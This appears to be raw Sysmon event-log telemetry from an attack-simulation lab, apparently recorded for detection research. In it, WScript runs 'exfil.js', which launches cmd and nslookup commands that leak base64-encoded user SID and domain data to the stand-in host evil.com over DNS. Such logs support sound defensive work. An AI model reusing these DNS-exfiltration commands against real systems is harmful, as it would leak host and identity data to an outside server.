C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.950{2E1864BB-17A1-629A-783D-000000005F02}55527988C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-BF40-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.955{2E1864BB-17C1-629A-BF40-000000005F02}3212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvwen.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.934{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwwsmk.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-17C1-629A-BD40-000000005F02}14927884C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-BE40-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BE40-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.896{2E1864BB-17C1-629A-BC40-000000005F02}76925608C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-BE40-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.900{2E1864BB-17C1-629A-BE40-000000005F02}7984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-BC40-000000005F02}7692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwwsmk.tmp 2>&1 10341000x8000000000000000201172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.881{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-BD40-000000005F02}1492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.881{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-BD40-000000005F02}1492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.865{2E1864BB-17C1-629A-BD40-000000005F02}14927884C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-BC40-000000005F02}7692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BD40-000000005F02}1492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BC40-000000005F02}7692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-17A1-629A-783D-000000005F02}55526028C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-BC40-000000005F02}7692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.858{2E1864BB-17C1-629A-BC40-000000005F02}7692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwwsmk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.849{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllzr.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.834{2E1864BB-17C1-629A-BA40-000000005F02}47606488C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-BB40-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.834{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.818{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.818{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.818{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.818{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-BB40-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.818{2E1864BB-17C1-629A-B940-000000005F02}73922444C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-BB40-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 